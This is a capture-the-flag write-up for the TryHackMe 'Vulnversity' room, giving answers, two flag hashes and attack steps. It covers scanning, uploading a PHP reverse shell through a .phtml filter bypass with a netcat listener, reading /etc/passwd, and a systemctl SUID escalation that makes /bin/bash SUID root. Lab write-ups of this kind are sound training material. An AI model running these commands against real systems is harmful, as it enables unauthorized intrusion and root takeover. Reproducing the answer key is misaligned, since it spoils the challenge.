# Vulnversity

![Vulnversity](https://i.imgur.com/zjvHyPt_d.webp?maxwidth=760&fidelity=grand)
----------------------------------------------------------

## [Video Write-up](https://www.youtube.com/watch?v=ctLV-kDyKNo)

Link : https://tryhackme.com/room/vulnversity

-----------------------------------------------------

## Task-1 Deploy the machine
```
Done
```
-------------------------------------------------

## Task-2 Reconnaissance

Gather information about this machine using a network scanning tool called nmap. 

> Checkout the following:
* [Nmap_enumeration](https://gitlab.com/Ayush_C/thm/-/blob/master/Vulnversity/nmap/nmap_enumeration.md)

1. There are many nmap "cheatsheets" online that you can use too.
```
Done
```

2. Scan the box, how many ports are open?
```
6
```

3. What version of the squid proxy is running on the machine?

```
3.5.12
```

4. How many ports will nmap scan if the flag -p-400 was used?

```
400
```

5. Using the nmap flag -n what will it not resolve?

```
DNS
```

6. What is the most likely operating system this machine is running?

```
Ubuntu
```

7. What port is the web server running on?

```
3333
```

8. Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

```
Done
```
-------------------------------------------------

## Task-3 Locating directories using GoBuster 

Using a fast directory discovery tool called GoBuster you will locate a directory that you can use to upload a shell to.

Lets first start of by scanning the website to find any hidden directories. To do this, we're going to use GoBuster.

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

> Gobuster syntax :

```
gobuster dir -u http://10.10.58.19:3333 -w /usr/share/dirb/wordlists/common.txt
```

> Directories found:

```
/internal/

/internal/uploads/

```

1. Run GoBuster with a wordlist: gobuster dir -u http://<ip>:3333 -w <word list location>

```
Done
```

2. What is the directory that has an upload form page?

```
/internal/
```
-------------------------------------------------

## Task-4 Compromise the webserver 

1. Try upload a few file types to the server, what common extension seems to be blocked?

```
.php
```
2. To identify which extensions are not blocked, we're going to fuzz the upload form. 

```
Done
```

> Php reverse shell (by pentestmonkey) :

[rev_shell](https://gitlab.com/Ayush_C/thm/-/blob/master/Vulnversity/php_reverse_shell/reverse_shell.php)

> Netcat Syntax :

```sh
nc -lnvp 1234
```

3. Run this attack, what extension is allowed?

```
.phtml
```

> Username enumeration

```sh
cat /etc/passwd
```

4. What is the name of the user who manages the webserver?

```
bill
```

5. What is the user flag?

```
8bd7992fbe8a6ad22a63361004cfcedb
```
-------------------------------------------------

## Task-5  Privilege Escalation 

> Follow the following steps (by GTFObins) :

```md
# Step-1

find / -perm /4000 2>/dev/null

-------------------------------------------------

# Step-2

Copy the following and paste it into the shell...

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

```


1. On the system, search for all SUID files. What file stands out?

```
/bin/systemctl
```

2. Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?
Become root and get the last flag (/root/root.txt)

```
a58ff8579f0a9270368d33a9966c7fd5
```
